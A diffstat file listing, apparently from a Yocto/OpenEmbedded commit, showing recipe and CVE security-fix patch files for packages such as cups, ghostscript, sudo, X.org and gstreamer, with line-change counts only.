-rw-r--r--meta/recipes-extended/cups/cups/CVE-2022-26691.patch33
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32324.patch36
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-32360.patch31
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-34241.patch65
-rw-r--r--meta/recipes-extended/cups/cups/CVE-2023-4504.patch40
-rw-r--r--meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb1
-rw-r--r--meta/recipes-extended/ed/ed_1.15.bb1
-rw-r--r--meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch28
-rw-r--r--meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch24
-rw-r--r--meta/recipes-extended/gawk/gawk_5.0.1.bb15
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch31
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch109
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch121
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch37
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch238
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch65
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch54
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch145
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch60
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch51
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript_9.52.bb18
-rw-r--r--meta/recipes-extended/go-examples/go-helloworld_0.1.bb2
-rw-r--r--meta/recipes-extended/grep/grep_3.4.bb1
-rw-r--r--meta/recipes-extended/groff/groff_1.22.4.bb5
-rw-r--r--meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch45
-rw-r--r--meta/recipes-extended/gzip/gzip_1.10.bb1
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch79
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch37
-rw-r--r--meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch45
-rw-r--r--meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch94
-rw-r--r--meta/recipes-extended/iputils/iputils_s20190709.bb8
-rw-r--r--meta/recipes-extended/less/less/CVE-2022-48624.patch41
-rw-r--r--meta/recipes-extended/less/less_551.bb1
-rw-r--r--meta/recipes-extended/libaio/libaio_0.3.111.bb2
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch183
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch23
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch172
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch321
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch121
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch93
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch29
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch43
-rw-r--r--meta/recipes-extended/libarchive/libarchive_3.4.2.bb14
-rw-r--r--meta/recipes-extended/libnsl/libnsl2_git.bb2
-rw-r--r--meta/recipes-extended/libnss-nis/libnss-nis.bb6
-rw-r--r--meta/recipes-extended/libsolv/files/CVE-2021-3200.patch82
-rw-r--r--meta/recipes-extended/libsolv/libsolv_0.7.10.bb4
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch155
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb6
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch10
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch224
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch100
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch35
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb4
-rw-r--r--meta/recipes-extended/logrotate/logrotate_3.15.1.bb6
-rw-r--r--meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch27
-rw-r--r--meta/recipes-extended/lsb/lsb-release_1.4.bb1
-rw-r--r--meta/recipes-extended/lsof/lsof_4.91.bb2
-rw-r--r--meta/recipes-extended/ltp/ltp_20200120.bb2
-rw-r--r--meta/recipes-extended/lzip/lzip_1.21.bb1
-rw-r--r--meta/recipes-extended/man-db/man-db_2.9.0.bb1
-rw-r--r--meta/recipes-extended/mc/mc_4.8.23.bb1
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28736.patch77
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28938.patch80
-rw-r--r--meta/recipes-extended/mdadm/mdadm_4.1.bb3
-rw-r--r--meta/recipes-extended/mingetty/mingetty_1.08.bb1
-rw-r--r--meta/recipes-extended/newt/libnewt_0.52.21.bb2
-rw-r--r--meta/recipes-extended/pam/libpam/CVE-2024-22365.patch59
-rw-r--r--meta/recipes-extended/pam/libpam_1.3.1.bb1
-rw-r--r--meta/recipes-extended/parted/parted_3.3.bb1
-rw-r--r--meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb2
-rw-r--r--meta/recipes-extended/perl/libtimedate-perl_2.30.bb1
-rw-r--r--meta/recipes-extended/procps/procps/CVE-2023-4016.patch85
-rw-r--r--meta/recipes-extended/procps/procps_3.3.16.bb3
-rw-r--r--meta/recipes-extended/psmisc/psmisc_23.3.bb2
-rw-r--r--meta/recipes-extended/quota/quota_4.05.bb1
-rw-r--r--meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb2
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2021-26937.patch68
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2023-24626.patch40
-rw-r--r--meta/recipes-extended/screen/screen_4.8.0.bb2
-rw-r--r--meta/recipes-extended/sed/sed_4.8.bb1
-rw-r--r--meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch66
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-29383.patch54
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-4641.patch146
-rw-r--r--meta/recipes-extended/shadow/shadow-sysroot_4.6.bb2
-rw-r--r--meta/recipes-extended/shadow/shadow.inc6
-rw-r--r--meta/recipes-extended/shadow/shadow_4.8.1.bb5
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch26
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb7
-rw-r--r--meta/recipes-extended/sudo/files/CVE-2023-22809.patch113
-rw-r--r--meta/recipes-extended/sudo/sudo.inc4
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch59
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch646
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch26
-rw-r--r--meta/recipes-extended/sudo/sudo_1.8.32.bb4
-rw-r--r--meta/recipes-extended/sysklogd/sysklogd.inc2
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch92
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch46
-rw-r--r--meta/recipes-extended/sysstat/sysstat_12.2.1.bb5
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2021-20193.patch133
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2022-48303.patch43
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2023-39804.patch64
-rw-r--r--meta/recipes-extended/tar/tar_1.32.bb9
-rw-r--r--meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb1
-rw-r--r--meta/recipes-extended/timezone/timezone.inc8
-rw-r--r--meta/recipes-extended/timezone/tzdata.bb10
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch67
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch39
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch33
-rw-r--r--meta/recipes-extended/unzip/unzip_6.0.bb7
-rw-r--r--meta/recipes-extended/watchdog/watchdog_5.15.bb1
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch165
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb2
-rw-r--r--meta/recipes-extended/xinetd/xinetd_2.3.15.bb3
-rw-r--r--meta/recipes-extended/xz/xz/CVE-2022-1271.patch96
-rw-r--r--meta/recipes-extended/xz/xz_5.2.4.bb5
-rw-r--r--meta/recipes-extended/zip/zip_3.0.bb1
-rw-r--r--meta/recipes-gnome/epiphany/epiphany_3.34.4.bb4
-rw-r--r--meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch46
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch40
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch61
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb2
-rw-r--r--meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb2
-rw-r--r--meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb2
-rw-r--r--meta/recipes-gnome/libnotify/libnotify_0.7.8.bb7
-rw-r--r--meta/recipes-gnome/librsvg/librsvg_2.40.21.bb3
-rw-r--r--meta/recipes-gnome/libsecret/libsecret_0.20.1.bb1
-rw-r--r--meta/recipes-graphics/builder/builder_0.1.bb2
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch21
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch46
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch60
-rw-r--r--meta/recipes-graphics/cairo/cairo_1.16.0.bb1
-rw-r--r--meta/recipes-graphics/clutter/clutter-gst-3.0.inc4
-rw-r--r--meta/recipes-graphics/clutter/clutter-gtk-1.0.inc5
-rw-r--r--meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch3
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch33
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch38
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch31
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch40
-rw-r--r--meta/recipes-graphics/freetype/freetype_2.10.1.bb4
-rw-r--r--meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch56
-rw-r--r--meta/recipes-graphics/glew/glew/notempdir.patch19
-rw-r--r--meta/recipes-graphics/glew/glew_2.2.0.bb2
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch335
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch135
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch179
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb5
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch457
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch400
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch133
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch97
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch75
-rw-r--r--meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb5
-rw-r--r--meta/recipes-graphics/kmscube/kmscube_git.bb6
-rw-r--r--meta/recipes-graphics/libfakekey/libfakekey_git.bb2
-rw-r--r--meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb2
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch79
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb3
-rw-r--r--meta/recipes-graphics/libva/libva-utils_2.6.0.bb2
-rw-r--r--meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb2
-rw-r--r--meta/recipes-graphics/mesa/mesa.inc2
-rw-r--r--meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb1
-rw-r--r--meta/recipes-graphics/mx/mx-1.0_1.4.7.bb2
-rw-r--r--meta/recipes-graphics/mx/mx.inc6
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch27
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch31
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch44
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch28
-rw-r--r--meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit_git.bb14
-rw-r--r--meta/recipes-graphics/startup-notification/startup-notification_0.12.bb5
-rw-r--r--meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb1
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch100
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb3
-rw-r--r--meta/recipes-graphics/vulkan/assimp_5.0.1.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-demos_git.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb3
-rw-r--r--meta/recipes-graphics/waffle/waffle_1.6.0.bb18
-rw-r--r--meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch360
-rw-r--r--meta/recipes-graphics/wayland/libinput_1.15.2.bb1
-rw-r--r--meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch111
-rw-r--r--meta/recipes-graphics/wayland/wayland_1.18.0.bb1
-rw-r--r--meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch32
-rw-r--r--meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch57
-rw-r--r--meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch99
-rw-r--r--meta/recipes-graphics/wayland/weston_8.0.0.bb3
-rw-r--r--meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb3
-rw-r--r--meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb2
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch333
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch58
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch38
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch111
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch63
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch42
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch46
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch52
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch64
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb9
-rw-r--r--meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb (renamed from meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb)7
-rw-r--r--meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb2
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch34
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb1
-rw-r--r--meta/recipes-graphics/xorg-lib/xorg-lib-common.inc3
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg.inc14
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14345.patch182
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch70
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch40
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch39
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch86
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch78
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch51
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch75
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch84
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch102
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch79
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch63
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch87
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch221
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch41
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch45
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch113
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch74
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch57
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch47
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb61
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb39
-rw-r--r--meta/recipes-kernel/blktrace/blktrace_git.bb7
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb3
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev.inc7
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch49
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch42
-rw-r--r--meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch32
-rw-r--r--meta/recipes-kernel/dtc/dtc.inc2
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch35
-rw-r--r--meta/recipes-kernel/dtc/dtc_1.6.0.bb2
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb17
-rw-r--r--meta/recipes-kernel/kern-tools/kern-tools-native_git.bb6
-rw-r--r--meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb3
-rw-r--r--meta/recipes-kernel/kmod/kmod.inc3
-rw-r--r--meta/recipes-kernel/kmod/kmod/ptest.patch25
-rw-r--r--meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb (renamed from meta/recipes-kernel/linux-firmware/linux-firmware_20201218.bb)209
-rw-r--r--meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc2
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion.inc13
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion_5.4.inc9445
-rwxr-xr-xmeta/recipes-kernel/linux/generate-cve-exclusions.py101
-rw-r--r--meta/recipes-kernel/linux/kernel-devsrc.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-dummy.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-dev.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto.inc4
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.4.bb23
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch42
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch88
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch316
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch179
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch91
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch124
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch82
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch71
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch155
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0010-fix-include-order-for-older-kernels.patch31
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0011-Add-release-maintainer-script.patch59
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0012-Improve-the-release-script.patch173
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch32
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0014-Revert-fix-include-order-for-older-kernels.patch32
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch46
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0016-fix-adjust-version-range-for-trace_find_free_extent.patch30
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch46
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch45
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch51
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch147
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb (renamed from meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb)29
-rw-r--r--meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb3
-rw-r--r--meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb5
-rw-r--r--meta/recipes-kernel/perf/perf.bb10
-rw-r--r--meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch70
-rw-r--r--meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch29
-rw-r--r--meta/recipes-kernel/powertop/powertop_2.10.bb10
-rw-r--r--meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb2
-rw-r--r--meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch49
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.bb7
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.inc2
-rw-r--r--meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb (renamed from meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.11.20.bb)4
-rw-r--r--meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb2
-rw-r--r--meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb5
-rw-r--r--meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb2
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch61
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch53
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch36
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch41
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch67
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch136
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb8
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2020-22219.patch197
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2021-0561.patch34
-rw-r--r--meta/recipes-multimedia/flac/flac_1.3.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb5
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch36
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch207
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch44
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch59
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch69
